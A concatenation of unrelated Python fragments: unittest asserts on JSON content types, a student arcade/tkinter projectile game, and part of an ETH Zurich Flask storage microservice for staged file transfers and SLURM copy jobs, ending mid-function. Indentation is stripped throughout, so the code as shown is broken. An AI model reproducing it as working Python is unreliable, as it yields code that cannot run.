self.assertFalse(is_json_content_type('text/json'))
self.assertFalse(is_json_content_type('text/plain'))
self.assertFalse(is_json_content_type('json'))
self.assertFalse(is_json_content_type('application/jsonfoo'))
|
test.py
|
#imports
import arcade
import random
import math
import os
import timeit
import threading
import time
from tkinter import *
from tkinter.ttk import *
import tkinter as tk
# Set up the constants
SCREEN_WIDTH = 800
SCREEN_HEIGHT = 600
SCREEN_GAME_Height = 300
SCREEN_GAME_Width = 400
SCREEN_TITLE = "CS 230 Final Project!"
SQUARE_LENGTH = 20
NUMBER_OF_SHAPES = 1
lastChoice = "Right"
class Shape:
def __init__(self, x, y, width, height, angle, delta_x, delta_y,
delta_angle, color):
self.x = x
self.y = y
self.width = width
self.height = height
self.angle = angle
self.delta_x = delta_x
self.delta_y = delta_y
self.delta_angle = delta_angle
self.color = color
def move(self):
self.x += self.delta_x
self.y += self.delta_y
self.angle += self.delta_angle
class Ellipse(Shape):
def draw(self):
arcade.draw_ellipse_filled(self.x, self.y, self.width, self.height,
self.color, self.angle)
class Rectangle(Shape):
def draw(self):
arcade.draw_rectangle_filled(self.x, self.y, self.width, self.height,
self.color, self.angle)
class RectangleOutline(Shape):
def draw(self):
arcade.draw_rectangle_outline(self.x, self.y, self.width, self.height,
self.color, 3)
class Line(Shape):
def draw(self):
newX = 25 * math.cos(self.angle * math.pi / 180)
newY = 25 * math.sin(self.angle * math.pi / 180)
arcade.draw_line(self.x, self.y, self.x + newX, self.y + newY, self.color, 3)
arcade.draw_ellipse_filled(self.x + newX, self.y + newY, 10, 10, self.color, 3)
class MyGame(arcade.Window):
""" Main application class. """
def __init__(self):
super().__init__(SCREEN_WIDTH, SCREEN_HEIGHT, SCREEN_TITLE)
file_path = os.path.join(os.path.dirname(__file__))
os.chdir(file_path)
self.shape_list = None
arcade.set_background_color(arcade.color.BOLE)
self.size = 100
self.isRunning = False
def setup(self):
""" Set up the game and initialize the variables. """
self.shape_list = []
x = random.randrange(SQUARE_LENGTH, SCREEN_WIDTH - SQUARE_LENGTH)
y = SQUARE_LENGTH / 2
base = Rectangle(x, y, SQUARE_LENGTH, SQUARE_LENGTH, 0, 0, 0, 0, arcade.color.YELLOW)
self.shape_list.append(base)
line = Line(x, y, 0, 0, 0, 0, 0, 0, arcade.color.BLACK)
self.shape_list.append(line)
if(x > SCREEN_WIDTH - x):
self.targetX = random.randrange(int(self.size / 2), int(x - SQUARE_LENGTH - self.size / 2))
else:
self.targetX = random.randrange(int(x + SQUARE_LENGTH + self.size / 2), int(SCREEN_WIDTH - self.size / 2))
targetY = self.size / 2
zone = RectangleOutline(self.targetX, targetY, self.size, self.size, 0, 0, 0, 0, arcade.color.RED)
self.shape_list.append(zone)
def update_line(self, linVel, angVel):
line = self.shape_list[1]
line.angle = angVel
self.linearVelocity = linVel
def reflect_line(self):
global lastChoice
line = self.shape_list[1]
while line.angle < 0:
line.angle = line.angle + 360
angle = line.angle % 360
if lastChoice == "Left" and (angle <= 90 or angle >= 270):
line.angle = (line.angle + 180)
if lastChoice == "Right" and (angle >= 90 and angle <= 270):
line.angle = (line.angle + 180)
#line.angle = -1 * line.angle
def simulate_ball(self):
self.isRunning = True
self.t = 0
self.oldX = self.shape_list[0].x
self.oldY = self.shape_list[0].y
def on_draw(self):
"""
Render the screen.
"""
arcade.start_render()
for shape in self.shape_list:
if(self.isRunning == True):
angle = self.shape_list[1].angle * math.pi / 180
self.shape_list[0].x = self.linearVelocity * math.cos(angle) * self.t + self.shape_list[1].x
self.shape_list[0].y = -16*self.t*self.t + (self.linearVelocity * math.sin(angle) * self.t) + SQUARE_LENGTH
self.t = self.t + 0.01
if(self.shape_list[0].y <= 5):
if(self.shape_list[0].x >= self.targetX + SQUARE_LENGTH / 2 - self.size / 2 and self.shape_list[0].x <= self.targetX - SQUARE_LENGTH / 2 + self.size / 2):
self.size = int(math.floor(self.size * 0.9))
self.setup()
else:
self.shape_list[0].x = self.oldX
self.shape_list[0].y = self.oldY
self.isRunning = False
if(self.isRunning == False or not isinstance(shape, Line)):
shape.draw()
def selectOption():
global angVelRButton, gameWindow, lastChoice
if(angVelRButton.get() != "" and angVelRButton.get() != lastChoice):
lastChoice = angVelRButton.get()
gameWindow.reflect_line()
def onPlayClick():
global gameWindow
gameWindow.simulate_ball()
def onChange(evt):
global linVelEntry, angVelEntry, gameWindow
if(linVelEntry.get() == '' or math.isnan(int(linVelEntry.get()))):
linVel = 0
else:
linVel = int(linVelEntry.get())
if(angVelEntry.get() == '' or math.isnan(int(angVelEntry.get()))):
ang = 0
else:
ang = int(angVelEntry.get())
gameWindow.update_line(linVel, ang)
def onExitClick():
global buttonWindow, gameWindow
buttonWindow.destroy()
arcade.close_window()
def createWindow(app):
global angVelRButton, linVelEntry, angVelEntry
app.columnconfigure(5)
lengths = [2, 15, 1, 15, 2]
for i in range(0,len(lengths)):
Label(app, text=' ', width=lengths[i]).grid(row=0, column=i)
Label(app, text='Starting Linear Velocity:').grid(row=1, column=1)
linVelEntry = Entry(app)
linVelEntry.grid(row=1, column=3)
linVelEntry.bind("<KeyRelease>", onChange)
for i in range(0,len(lengths)):
Label(app, text=' ', width=lengths[i]).grid(row=2, column=i)
Label(app, text='Starting Angle:').grid(row=3, column=1)
angVelEntry = Entry(app)
angVelEntry.grid(row=3, column=3)
angVelEntry.bind("<KeyRelease>", onChange)
for i in range(0,len(lengths)):
Label(app, text=' ', width=lengths[i]).grid(row=4, column=i)
Label(app, text='Velocity Direction:').grid(row=5, column=1)
Types = ["Left", "Right"]
angVelRButton = StringVar()
for i in range(0,len(Types)):
text = Types[i]
Radiobutton(app, text=text, variable=angVelRButton, value=text, command=selectOption).grid(row=6, column=2*i+1)
for i in range(0,len(lengths)):
Label(app, text=' ', width=lengths[i]).grid(row=7, column=i)
playButton = Button(app, text='Play', command=onPlayClick)
playButton.grid(row=8, column=1)
closeButton = Button(app, text='Exit', command=onExitClick)
closeButton.grid(row=8, column=3)
app.geometry("320x200")
app.mainloop()
def handleWindow():
global buttonWindow
buttonWindow = tk.Tk(className='CS 230 Final Project')
createWindow(buttonWindow)
def main():
global gameWindow
buttonWindow = threading.Thread(target=handleWindow)
buttonWindow.start()
gameWindow = MyGame()
gameWindow.setup()
arcade.run()
if __name__ == "__main__":
main()
|
storage.py
|
#
# Copyright (c) 2019-2021, ETH Zurich. All rights reserved.
#
# Please, refer to the LICENSE file in the root directory.
# SPDX-License-Identifier: BSD-3-Clause
#
from flask import Flask, request, jsonify, g
import json, tempfile, os
import urllib
import datetime
import async_task
import threading
# logging handler
from logging.handlers import TimedRotatingFileHandler
# common functions
from cscs_api_common import check_auth_header, get_username
from cscs_api_common import create_task, update_task, get_task_status
from cscs_api_common import exec_remote_command
from cscs_api_common import create_certificate
from cscs_api_common import in_str
from cscs_api_common import is_valid_file, is_valid_dir, check_command_error, get_boolean_var, validate_input, LogRequestFormatter
# job_time_checker for correct SLURM job time in /xfer-internal tasks
import job_time
# for debug purposes
import logging
import requests
from hashlib import md5
import stat
from cryptography.fernet import Fernet
import time
from flask_opentracing import FlaskTracing
from jaeger_client import Config
import opentracing
## READING vars environment vars
CERTIFICATOR_URL = os.environ.get("F7T_CERTIFICATOR_URL")
TASKS_URL = os.environ.get("F7T_TASKS_URL")
COMPUTE_URL = os.environ.get("F7T_COMPUTE_URL")
KONG_URL = os.environ.get("F7T_KONG_URL")
STORAGE_PORT = os.environ.get("F7T_STORAGE_PORT", 5000)
AUTH_HEADER_NAME = 'Authorization'
# Machines for Storage:
# Filesystem DNS or IP where to download or upload files:
SYSTEMS_INTERNAL_STORAGE = os.environ.get("F7T_SYSTEMS_INTERNAL_STORAGE").strip('\'"')
# Job machine where to send xfer-internal jobs (must be defined in SYSTEMS_PUBLIC)
STORAGE_JOBS_MACHINE = os.environ.get("F7T_STORAGE_JOBS_MACHINE").strip('\'"')
# SYSTEMS_PUBLIC: list of allowed systems
# remove quotes and split into array
SYSTEMS_PUBLIC = os.environ.get("F7T_SYSTEMS_PUBLIC").strip('\'"').split(";")
# internal machines to submit/query jobs
SYS_INTERNALS = os.environ.get("F7T_SYSTEMS_INTERNAL_COMPUTE").strip('\'"').split(";")
# internal machines for small operations
SYS_INTERNALS_UTILITIES = os.environ.get("F7T_SYSTEMS_INTERNAL_UTILITIES").strip('\'"').split(";")
###### ENV VAR FOR DETECT TECHNOLOGY OF STAGING AREA:
OBJECT_STORAGE = os.environ.get("F7T_OBJECT_STORAGE", "").strip('\'"')
# Scheduller partition used for internal transfers
XFER_PARTITION = os.environ.get("F7T_XFER_PARTITION", "").strip('\'"')
# --account parameter needed in sbatch?
USE_SLURM_ACCOUNT = get_boolean_var(os.environ.get("F7T_USE_SLURM_ACCOUNT", False))
# Machine used for external transfers
EXT_TRANSFER_MACHINE_PUBLIC=os.environ.get("F7T_EXT_TRANSFER_MACHINE_PUBLIC", "").strip('\'"')
EXT_TRANSFER_MACHINE_INTERNAL=os.environ.get("F7T_EXT_TRANSFER_MACHINE_INTERNAL", "").strip('\'"')
OS_AUTH_URL = os.environ.get("F7T_OS_AUTH_URL")
OS_IDENTITY_PROVIDER = os.environ.get("F7T_OS_IDENTITY_PROVIDER")
OS_IDENTITY_PROVIDER_URL= os.environ.get("F7T_OS_IDENTITY_PROVIDER_URL")
OS_PROTOCOL = os.environ.get("F7T_OS_PROTOCOL")
OS_INTERFACE = os.environ.get("F7T_OS_INTERFACE")
OS_PROJECT_ID = os.environ.get("F7T_OS_PROJECT_ID")
# SECRET KEY for temp url without using Token
SECRET_KEY = os.environ.get("F7T_SECRET_KEY")
# Expiration time for temp URLs in seconds, by default 30 days
STORAGE_TEMPURL_EXP_TIME = int(os.environ.get("F7T_STORAGE_TEMPURL_EXP_TIME", "2592000").strip('\'"'))
# max file size for temp URLs in MegaBytes, by default 5120 MB = 5 GB
STORAGE_MAX_FILE_SIZE = int(os.environ.get("F7T_STORAGE_MAX_FILE_SIZE", "5120").strip('\'"'))
# for use on signature of URL it must be in bytes (MB*1024*1024 = Bytes)
STORAGE_MAX_FILE_SIZE *= 1024*1024
UTILITIES_TIMEOUT = int(os.environ.get("F7T_UTILITIES_TIMEOUT", "5").strip('\'"'))
STORAGE_POLLING_INTERVAL = int(os.environ.get("F7T_STORAGE_POLLING_INTERVAL", "60").strip('\'"'))
CERT_CIPHER_KEY = os.environ.get("F7T_CERT_CIPHER_KEY", "").strip('\'"').encode('utf-8')
### SSL parameters
USE_SSL = get_boolean_var(os.environ.get("F7T_USE_SSL", False))
SSL_CRT = os.environ.get("F7T_SSL_CRT", "")
SSL_KEY = os.environ.get("F7T_SSL_KEY", "")
# verify signed SSL certificates
SSL_SIGNED = get_boolean_var(os.environ.get("F7T_SSL_SIGNED", False))
TRACER_HEADER = "uber-trace-id"
# aynchronous tasks: upload & download --> http://TASKS_URL
# {task_id : AsyncTask}
storage_tasks = {}
# relationship between upload task and filesystem
# {hash_id : {'user':user,'system':system,'target':path,'source':fileName,'status':status_code, 'hash_id':task_id, 'trace_id':trace_id}}
uploaded_files = {}
# debug on console
debug = get_boolean_var(os.environ.get("F7T_DEBUG_MODE", False))
app = Flask(__name__)
JAEGER_AGENT = os.environ.get("F7T_JAEGER_AGENT", "").strip('\'"')
if JAEGER_AGENT != "":
config = Config(
config={'sampler': {'type': 'const', 'param': 1 },
'local_agent': {'reporting_host': JAEGER_AGENT, 'reporting_port': 6831 },
'logging': True,
'reporter_batch_size': 1},
service_name = "storage")
jaeger_tracer = config.initialize_tracer()
tracing = FlaskTracing(jaeger_tracer, True, app)
else:
jaeger_tracer = None
tracing = None
def get_tracing_headers(req):
"""
receives a requests object, returns headers suitable for RPC and ID for logging
"""
new_headers = {}
if JAEGER_AGENT != "":
try:
jaeger_tracer.inject(tracing.get_span(req), opentracing.Format.TEXT_MAP, new_headers)
except Exception as e:
app.logger.error(e)
new_headers[AUTH_HEADER_NAME] = req.headers[AUTH_HEADER_NAME]
ID = new_headers.get(TRACER_HEADER, '')
return new_headers, ID
def file_to_str(fileName):
str_file = ""
try:
fileObj = open(fileName,"r")
str_file = fileObj.read()
fileObj.close()
return str_file
except IOError as e:
app.logger.error(e)
return ""
def str_to_file(str_file,dir_name,file_name):
try:
if not os.path.exists(dir_name):
app.logger.info(f"Created temp directory for certs in {dir_name}")
os.makedirs(dir_name)
file_str = open(f"{dir_name}/{file_name}","w")
file_str.write(str_file)
file_str.close()
app.logger.info(f"File written in {dir_name}/{file_name}")
except IOError as e:
app.logger.error("Couldn't write file {dir_name}/{file_name}")
app.logger.error(e)
def os_to_fs(task_id):
upl_file = uploaded_files[task_id]
system_name = upl_file["system_name"]
system_addr = upl_file["system_addr"]
username = upl_file["user"]
objectname = upl_file["source"]
headers = {}
headers[TRACER_HEADER] = upl_file['trace_id']
try:
app.logger.info(upl_file["msg"])
# certificate is encrypted with CERT_CIPHER_KEY key
# here is decrypted
cert = upl_file["msg"]["cert"]
cipher = Fernet(CERT_CIPHER_KEY)
# the decryption process produces a byte type
# remember that is stored as str not as byte in the JSON
pub_cert = cipher.decrypt(cert[0].encode('utf-8')).decode('utf-8')
# cert_pub in 0 /user-key-cert.pub
# temp-dir in 1
# get tmp directory
td = cert[1]
app.logger.info(f"Temp dir: {td}")
if not os.path.exists(td):
# retrieve public certificate and store in temp dir location
str_to_file(pub_cert,td,"user-key-cert.pub")
# user public and private key should be in Storage / path, symlinking in order to not use the same key at the same time
os.symlink(os.getcwd() + "/user-key.pub", td + "/user-key.pub") # link on temp dir
os.symlink(os.getcwd() + "/user-key", td + "/user-key") # link on temp dir
# stat.S_IRUSR -> owner has read permission
os.chmod(td + "/user-key-cert.pub", stat.S_IRUSR)
cert_list = [f"{td}/user-key-cert.pub", f"{td}/user-key.pub", f"{td}/user-key", td]
# start download from OS to FS
update_task(task_id, headers, async_task.ST_DWN_BEG)
# execute download
result = exec_remote_command(username, system_name, system_addr, "", "storage_cert", cert_list)
# if no error, then download is complete
if result["error"] == 0:
update_task(task_id, headers, async_task.ST_DWN_END)
# No need to delete the dictionary, it will be cleaned on next iteration
# delete upload request
# del uploaded_files[task_id]
# must be deleted after object is moved to storage
# staging.delete_object(containername=username,prefix=task_id,objectname=objectname)
# for big files delete_object consumes a long time and often gives a TimeOut error between system and staging area
# Therefore, using delete_object_after a few minutes (in this case 5 minutes) will trigger internal staging area
# mechanism to delete the file automatically and without a need of a connection
staging.delete_object_after(containername=username,prefix=task_id,objectname=objectname, ttl = int(time.time())+600)
else:
# if error, should be prepared for try again
upl_file["status"] = async_task.ST_DWN_ERR
uploaded_files[task_id] = upl_file
# update but conserv "msg" as the data for download to OS, to be used for retry in next iteration
update_task(task_id, headers, async_task.ST_DWN_ERR, msg=upl_file, is_json=True)
except Exception as e:
app.logger.error(e)
# asynchronous check of upload_files to declare which is downloadable to FS
def check_upload_files():
global staging
while True:
# Get updated task status from Tasks microservice DB backend (TaskPersistence)
get_upload_unfinished_tasks()
app.logger.info(f"Check files in Object Storage - Pendings uploads: {len(uploaded_files)}")
# create STATIC auxiliary upload list in order to avoid "RuntimeError: dictionary changed size during iteration"
# (this occurs since upload_files dictionary is shared between threads and since Python3 dict.items() trigger that error)
upl_list= [(task_id, upload) for task_id,upload in uploaded_files.items()]
for task_id,upload in upl_list:
#checks if file is ready or not for download to FileSystem
try:
task_status = async_task.status_codes[upload['status']]
headers = {}
app.logger.info(f"Status of {task_id}: {task_status}")
#if upload["status"] in [async_task.ST_URL_REC,async_task.ST_DWN_ERR] :
if upload["status"] == async_task.ST_URL_REC:
app.logger.info(f"Task {task_id} -> File ready to upload or already downloaded")
upl = uploaded_files[task_id]
containername = upl["user"]
prefix = task_id
objectname = upl["source"]
headers[TRACER_HEADER] = upl['trace_id']
if not staging.is_object_created(containername,prefix,objectname):
app.logger.info(f"{containername}/{prefix}/{objectname} isn't created in staging area, continue polling")
continue
# confirms that file is in OS (auth_header is not needed)
update_task(task_id, headers, async_task.ST_UPL_CFM, msg=upload, is_json=True)
upload["status"] = async_task.ST_UPL_CFM
uploaded_files["task_id"] = upload
os_to_fs_task = threading.Thread(target=os_to_fs, name=upl['trace_id'], args=(task_id,))
os_to_fs_task.start()
# if the upload to OS is done but the download to FS failed, then resume
elif upload["status"] == async_task.ST_DWN_ERR:
upl = uploaded_files[task_id]
containername = upl["user"]
prefix = task_id
objectname = upl["source"]
headers[TRACER_HEADER] = upl['trace_id']
# if file has been deleted from OS, then erroneous upload process. Restart.
if not staging.is_object_created(containername,prefix,objectname):
app.logger.info(f"{containername}/{prefix}/{objectname} isn't created in staging area, task marked as erroneous")
update_task(task_id, headers ,async_task.ERROR, "File was deleted from staging area. Start a new upload process")
upload["status"] = async_task.ERROR
continue
# if file is still in OS, proceed to new download to FS
update_task(task_id, headers, async_task.ST_DWN_BEG)
upload["status"] = async_task.ST_DWN_BEG
uploaded_files["task_id"] = upload
os_to_fs_task = threading.Thread(target=os_to_fs, name=upl['trace_id'], args=(task_id,))
os_to_fs_task.start()
except Exception as e:
app.logger.error(type(e), e)
continue
time.sleep(STORAGE_POLLING_INTERVAL)
# async task for download large files
# user: user in the posix file system
# system: system in which the file will be stored (REMOVE later)
# sourcePath: path in FS where the object is
# task_id: async task id given for Tasks microservice
def download_task(headers, system_name, system_addr, sourcePath, task_id):
object_name = sourcePath.split("/")[-1]
global staging
# check if staging area token is valid
if not staging.renew_token():
msg = "Staging area auth error"
update_task(task_id, headers, async_task.ERROR, msg)
return
# create container if it doesn't exists:
container_name = get_username(headers[AUTH_HEADER_NAME])
if not staging.is_container_created(container_name):
errno = staging.create_container(container_name)
if errno == -1:
msg = f"Could not create container {container_name} in Staging Area ({staging.get_object_storage()})"
update_task(task_id, headers, async_task.ERROR, msg)
return
# upload file to swift
object_prefix = task_id
upload_url = staging.create_upload_form(sourcePath, container_name, object_prefix, STORAGE_TEMPURL_EXP_TIME, STORAGE_MAX_FILE_SIZE)
# advice Tasks that upload begins:
update_task(task_id, headers, async_task.ST_UPL_BEG)
# upload starts:
res = exec_remote_command(headers, system_name, system_addr, upload_url["command"])
# if upload to SWIFT fails:
if res["error"] != 0:
msg = f"Upload to Staging area has failed. Object: {object_name}"
error_str = res["msg"]
if in_str(error_str,"OPENSSH"):
error_str = "User does not have permissions to access machine"
msg = f"{msg}. {error_str}"
app.logger.error(msg)
update_task(task_id, headers, async_task.ST_UPL_ERR, msg)
return
# get Download Temp URL with [seconds] time expiration
# create temp url for file: valid for STORAGE_TEMPURL_EXP_TIME seconds
temp_url = staging.create_temp_url(container_name, object_prefix, object_name, STORAGE_TEMPURL_EXP_TIME,internal=False)
# if error raises in temp url creation:
if temp_url == None:
msg = f"Temp URL creation failed. Object: {object_name}"
update_task(task_id, headers, async_task.ERROR, msg)
return
# if succesfully created: temp_url in task with success status
update_task(task_id, headers, async_task.ST_UPL_END, temp_url)
# marked deletion from here to STORAGE_TEMPURL_EXP_TIME (default 30 days)
retval = staging.delete_object_after(containername=container_name,prefix=object_prefix,objectname=object_name,ttl=int(time.time()) + STORAGE_TEMPURL_EXP_TIME)
if retval == 0:
app.logger.info(f"Setting {STORAGE_TEMPURL_EXP_TIME} [s] as X-Delete-At")
else:
app.logger.error("Object couldn't be marked as X-Delete-At")
# download large file, returns temp url for downloading
@app.route("/xfer-external/download", methods=["POST"])
@check_auth_header
def download_request():
system_addr = EXT_TRANSFER_MACHINE_INTERNAL
system_name = EXT_TRANSFER_MACHINE_PUBLIC
sourcePath = request.form.get("sourcePath", None) # path file in cluster
v = validate_input(sourcePath)
if v != "":
return jsonify(description="Failed to download file", error=f"'sourcePath' {v}"), 400
[headers, ID] = get_tracing_headers(request)
# checks if sourcePath is a valid path
check = is_valid_file(sourcePath, headers, system_name, system_addr)
if not check["result"]:
return jsonify(description="sourcePath error"), 400, check["headers"]
# obtain new task from Tasks microservice
task_id = create_task(headers, service="storage")
# couldn't create task
if task_id == -1:
return jsonify(error="Couldn't create task"), 400
try:
# asynchronous task creation
aTask = threading.Thread(target=download_task, name=ID,
args=(headers, system_name, system_addr, sourcePath, task_id))
storage_tasks[task_id] = aTask
update_task(task_id, headers, async_task.QUEUED)
storage_tasks[task_id].start()
task_url = f"{KONG_URL}/tasks/{task_id}"
data = jsonify(success="Task created", task_url=task_url, task_id=task_id)
return data, 201
except Exception as e:
data = jsonify(error=e)
return data, 400
# invalidate temp URLs
# parameters:
# - X-Task-Id: task id of the transfer related to the URL that wants to be invalidated
@app.route("/xfer-external/invalidate", methods=["POST"])
@check_auth_header
def invalidate_request():
try:
task_id = request.headers["X-Task-Id"]
if not task_id.isalnum():
return jsonify(error="Header X-Task-Id is not alphanumeric"), 400
except KeyError as e:
return jsonify(error="Header X-Task-Id missing"), 400
[headers, ID] = get_tracing_headers(request)
# search if task belongs to the user
task_status = get_task_status(task_id, headers)
if task_status == -1:
return jsonify(error="Invalid X-Task-Id"), 400
containername = get_username(headers[AUTH_HEADER_NAME])
prefix = task_id
objects = staging.list_objects(containername,prefix)
for objectname in objects:
# error = staging.delete_object(containername,prefix,objectname)
# replacing delete_object by delete_object_after 5 minutes
error = staging.delete_object_after(containername=containername, prefix=prefix, objectname=objectname, ttl=int(time.time())+600)
if error == -1:
return jsonify(error="Could not invalidate URL"), 400
return jsonify(success="URL invalidated successfully"), 201
# async task for upload large files
# user: user in the posix file system
# system: system in which the file will be stored (REMOVE later)
# targetPath: absolute path in which to store the file
# sourcePath: absolute path in local FS
# task_id: async task_id created with Tasks microservice
def upload_task(headers, system_name, system_addr, targetPath, sourcePath, task_id):
fileName = sourcePath.split("/")[-1]
# container to bind:
container_name = get_username(headers[AUTH_HEADER_NAME])
ID = headers.get(TRACER_HEADER, '')
# change hash_id for task_id since is not longer needed for (failed) redirection
uploaded_files[task_id] = {"user": container_name,
"system_name": system_name,
"system_addr": system_addr,
"target": targetPath,
"source": fileName,
"status": async_task.ST_URL_ASK,
"hash_id": task_id,
"trace_id": ID}
data = uploaded_files[task_id]
global staging
data["msg"] = f"Waiting for Presigned URL to upload file to staging area ({staging.get_object_storage()})"
# change to dictionary containing upload data (for backup purpouses) and adding url call
update_task(task_id, headers, async_task.ST_URL_ASK, data, is_json=True)
# check if staging token is valid
if not staging.renew_token():
msg = "Staging Area auth error, try again later"
data["msg"] = msg
data["status"] = async_task.ERROR
update_task(task_id, headers, async_task.ERROR, data, is_json=True)
return
# create or return container
if not staging.is_container_created(container_name):
errno = staging.create_container(container_name)
if errno == -1:
msg = f"Could not create container {container_name} in Staging Area ({staging.get_object_storage()})"
data["msg"] = msg
data["status"] = async_task.ERROR
update_task(task_id, headers, async_task.ERROR, data, is_json=True)
return
object_prefix = task_id
# create temporary upload form
resp = staging.create_upload_form(sourcePath, container_name, object_prefix, STORAGE_TEMPURL_EXP_TIME, STORAGE_MAX_FILE_SIZE, internal=False)
# create download URL for later download from Object Storage to filesystem
app.logger.info("Creating URL for later download")
download_url = staging.create_temp_url(container_name, object_prefix, fileName, STORAGE_TEMPURL_EXP_TIME)
# create certificate for later download from OS to filesystem
app.logger.info(f"Creating certificate for later download")
options = f"-s -G -o '{targetPath}/{fileName}' -- '{download_url}'"
exp_time = STORAGE_TEMPURL_EXP_TIME
certs = create_certificate(headers, system_name, system_addr, f"ID={ID} curl", options, exp_time)
if not certs[0]:
msg = "Could not create certificate for download from Staging Area to filesystem"
app.logger.error(msg)
data["msg"] = msg
data["status"] = async_task.ERROR
update_task(task_id, headers, async_task.ERROR, data, is_json=True)
return
# converts file to string to store in Tasks
cert_pub = file_to_str(fileName=certs[0])
# key_pub = file_to_str(fileName=certs[1])
# key_priv = file_to_str(fileName=certs[2])
temp_dir = certs[3]
# encrypt certificate with CERT_CIPHER_KEY key
cipher = Fernet(CERT_CIPHER_KEY)
# data to be encrypted should be encoded to bytes
# in order to save it as json, the cert encrypted should be decoded to string
cert_pub_enc = cipher.encrypt(cert_pub.encode('utf-8')).decode('utf-8')
resp["download_url"] = download_url
resp["action"] = f"curl {options}"
resp["cert"] = [cert_pub_enc, temp_dir]
data["msg"] = resp
data["status"] = async_task.ST_URL_REC
app.logger.info("Cert and url created correctly")
update_task(task_id, headers, async_task.ST_URL_REC, data, is_json=True)
return
# upload API entry point:
@app.route("/xfer-external/upload",methods=["POST"])
@check_auth_header
def upload_request():
system_addr = EXT_TRANSFER_MACHINE_INTERNAL
system_name = EXT_TRANSFER_MACHINE_PUBLIC
targetPath = request.form.get("targetPath", None) # path to save file in cluster
v = validate_input(targetPath)
if v != "":
return jsonify(description="Failed to upload file", error=f"'targetPath' {v}"), 400
sourcePath = request.form.get("sourcePath", None) # path from the local FS
v = validate_input(sourcePath)
if v != "":
return jsonify(description="Failed to upload file", error=f"'sourcePath' {v}"), 400
[headers, ID] = get_tracing_headers(request)
# checks if targetPath is a valid path
check = is_valid_dir(targetPath, headers, system_name, system_addr)
if not check["result"]:
return jsonify(description="sourcePath error"), 400, check["headers"]
# obtain new task from Tasks microservice
task_id = create_task(headers, service="storage")
if task_id == -1:
return jsonify(error="Error creating task"), 400
# asynchronous task creation
try:
update_task(task_id, headers, async_task.QUEUED)
aTask = threading.Thread(target=upload_task, name=ID,
args=(headers, system_name, system_addr, targetPath, sourcePath, task_id))
storage_tasks[task_id] = aTask
storage_tasks[task_id].start()
task_url = f"{KONG_URL}/tasks/{task_id}"
data = jsonify(success="Task created",task_url=task_url,task_id=task_id)
return data, 201
except Exception as e:
data = jsonify(error=e)
return data, 400
## Internal Transfer MicroServices:
## cp / rm / mv / rsync using Jobs microservice
# executes system cp/mv/rm or rsync (xfer-internal)
# creates a sbatch file to execute in --partition=xfer
# user_header for user identification
# command = "cp" "mv" "rm" "rsync"
# jobName = --job-name parameter to be used on sbatch command
# jobTime = --time parameter to be used on sbatch command
# stageOutJobId = value to set in --dependency:afterok parameter
# account = value to set in --account parameter
def exec_internal_command(headers, command, jobName, jobTime, stageOutJobId, account):
try:
td = tempfile.mkdtemp(prefix="job")
sbatch_file = open(td + "/sbatch-job.sh", "w")
sbatch_file.write("#! /bin/bash -l\n")
sbatch_file.write(f"#SBATCH --job-name='{jobName}'\n")
sbatch_file.write(f"#SBATCH --time={jobTime}\n")
sbatch_file.write("#SBATCH --error=job-%j.err\n")
sbatch_file.write("#SBATCH --output=job-%j.out\n")
sbatch_file.write("#SBATCH --ntasks=1\n")
sbatch_file.write(f"#SBATCH --partition={XFER_PARTITION}\n")
# test line for error
# sbatch_file.write("#SBATCH --constraint=X2450\n")
if stageOutJobId != None:
sbatch_file.write(f"#SBATCH --dependency=afterok:{stageOutJobId}\n")
if account != None:
app.logger.info(account)
sbatch_file.write(f"#SBATCH --account='{account}'")
sbatch_file.write("\n")
ID = headers.get(TRACER_HEADER, '')
sbatch_file.write(f"echo Trace ID: {ID}\n")
sbatch_file.write("echo -e \"$SLURM_JOB_NAME started on $(date)\"\n")
sbatch_file.write(f"srun -n $SLURM_NTASKS {command}\n")
sbatch_file.write("echo -e \"$SLURM_JOB_NAME finished on $(date)\"\n")
sbatch_file.close()
except IOError as ioe:
app.logger.error(ioe.message)
result = {"error": 1, "msg":ioe.message}
return result
# create xfer job
resp = create_xfer_job(STORAGE_JOBS_MACHINE, headers, td + "/sbatch-job.sh")
try:
# remove sbatch file and dir
os.remove(td + "/sbatch-job.sh")
os.rmdir(td)
except IOError as ioe:
app.logger.error(f"Failed to remove temp sbatch file: {ioe.message}")
return resp
# Internal cp transfer via SLURM with xfer partition:
@app.route("/xfer-internal/cp", methods=["POST"])
@check_auth_header
def internal_cp():
return internal_operation(request, "cp")
# Internal mv transfer via SLURM with xfer partition:
@app.route("/xfer-internal/mv", methods=["POST"])
@check_auth_header
def internal_mv():
return internal_operation(request, "mv")
# Internal rsync transfer via SLURM with xfer partition:
@app.route("/xfer-internal/rsync", methods=["POST"])
@check_auth_header
def internal_rsync():
return internal_operation(request, "rsync")
# Internal rm transfer via SLURM with xfer partition:
@app.route("/xfer-internal/rm", methods=["POST"])
@check_auth_header
def internal_rm():
return internal_operation(request, "rm")
# common code for internal cp, mv, rsync, rm
def internal_operation(request, command):
system_idx = SYSTEMS_PUBLIC.index(STORAGE_JOBS_MACHINE)
system_addr = SYS_INTERNALS_UTILITIES[system_idx]
system_name = STORAGE_JOBS_MACHINE
targetPath = request.form.get("targetPath", None) # path to save file in cluster
v = validate_input(targetPath)
if v != "":
return jsonify(description=f"Error on {command} operation", error=f"'targetPath' {v}"), 400
[headers, ID] = get_tracing_headers(request)
# using actual_command to add options to check sanity of the command to be executed
actual_command = ""
if command in ['cp', 'mv', 'rsync']:
sourcePath = request.form.get("sourcePath", None) # path to get file in cluster
v = validate_input(sourcePath)
if v != "":
return jsonify(description=f"Error on {command} operation", error=f"'sourcePath' {v}"), 400
# checks if file to copy, move or rsync (targetPath) is a valid path
# remove the last part of the path (after last "/" char) to check if the dir can be written by user
_targetPath = targetPath.split("/")[:-1]
_targetPath = "/".join(_targetPath)
app.logger.info(f"_targetPath={_targetPath}")
check_dir = is_valid_dir(_targetPath, headers, system_name, system_addr)
if not check_dir["result"]:
return jsonify(description="targetPath error"), 400, check_dir["headers"]
check_file = is_valid_file(sourcePath, headers, system_name, system_addr)
if not check_file["result"]:
check_dir = is_valid_dir(sourcePath, headers, system_name, system_addr)
if not check_dir["result"]:
return jsonify(description="sourcePath error"), 400, check_dir["headers"]
if command == "cp":
actual_command = "cp --force -dR --preserve=all -- "
elif command == "mv":
actual_command = "mv --force -- "
else:
actual_command = "rsync -av -- "
elif command == "rm":
# for 'rm' there's no source, set empty to call exec_internal_command(...)
# checks if file or dir to delete (targetPath) is a valid path or valid directory
check_file = is_valid_file(targetPath, headers, system_name, system_addr)
if not check_file["result"]:
check_dir = is_valid_dir(targetPath, headers, system_name, system_addr)
if not check_dir["result"]:
